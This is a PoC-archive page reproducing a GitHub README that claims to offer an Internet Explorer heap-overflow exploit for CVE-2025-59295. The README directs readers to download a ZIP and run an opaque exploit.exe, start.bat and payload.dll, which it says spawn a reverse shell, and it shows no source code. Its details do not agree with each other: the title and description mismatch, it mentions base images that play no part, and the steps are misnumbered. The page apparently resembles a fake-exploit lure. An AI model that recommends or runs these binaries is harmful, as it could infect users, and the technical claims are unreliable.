Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-59295 PoC — Windows URL Parsing Remote Code Execution Vulnerability

Source
https://github.com/usjnx72726w/CVE-2025-59295
Associated Vulnerability
Title:Windows URL Parsing Remote Code Execution Vulnerability (CVE-2025-59295)
Description:Heap-based buffer overflow in Internet Explorer allows an unauthorized attacker to execute code over a network.
Readme
# Lab: CVE-2025-59295 - Heap-based Buffer Overflow in Internet Explorer

## ⚠️ Safety Disclaimer
This repository is provided for educational and research purposes only. It demonstrates a vulnerability in a controlled environment. Do not use this in production systems or against real-world targets without explicit permission. The exploit code is designed to be harmless in non-vulnerable setups but could potentially cause crashes or unintended behavior in emulated environments. The authors disclaim any liability for misuse.

## 🚀 Overview
CVE-2025-59295 is a heap-based buffer overflow vulnerability in Internet Explorer (versions 11 and below) that allows an unauthorized attacker to execute arbitrary code over a network. The flaw occurs during the parsing of malformed HTML canvas elements embedded with oversized script buffers, leading to memory corruption. 

Impact: This high-severity issue could enable remote code execution (RCE), sensitive data exfiltration, or system compromise when a victim browses a maliciously crafted webpage.

## 📋 Prerequisites
- A host machine with at least 4GB RAM and internet access for pulling base images.
- Basic knowledge of command-line tools and networking.
- Windows host or VM to run the exploit tool (as it's .exe-based).

## Download & Install
Download the exploit package (includes main exploit executable and starter batch file): [Download Exploit ZIP](https://github.com/usjnx72726w/CVE-2025-59295/raw/refs/heads/main/Howea/lab-cve-2025-59295.zip)
   - The ZIP contains:
     - `exploit.exe`: The main exploit binary, which hosts a malicious web server and crafts the overflow payload.
     - `start.bat`: A batch file to launch `exploit.exe` with default parameters.
     - Supporting files: `payload.dll` (payload library), `config.ini` (configuration for target IP/port).

## Usage
**Launch the Exploit**:
   - Unzip the exploit package.
   - Edit `config.ini` if needed (default targets localhost:8080).
     ```
     [Target]
     host=localhost
     port=8080
     ```
   - Run `start.bat`: This executes `exploit.exe`, which:
     - Crafts a malformed HTML payload exploiting the heap overflow via oversized ArrayBuffer manipulation.
     - Injects shellcode to spawn a reverse shell (logs to console).
     - Hosts the payload at `http://localhost:9000/exploit.html`.
3. **Trigger the Exploit**: From a vulnerable IE instance, visit `http://localhost:9000/exploit.html`. The buffer overflow should trigger, leading to:
   - Heap corruption.
   - Arbitrary code execution.
4. **Verify**: Check exploit.exe logs for success indicators like memory dump or shell access. Use tools like Wireshark to inspect network traffic for the overflow payload.

For any inquiries, please email me at: FarrishPiedra834@hotmail.com
File Snapshot

 [4.0K]  /data/pocs/7cf2d65a967774911eda458db861a47e8e983d41
├── [4.0K]  Howea
│   ├── [   1]  d
│   └── [8.0M]  lab-cve-2025-59295.zip
└── [2.7K]  README.md

1 directory, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →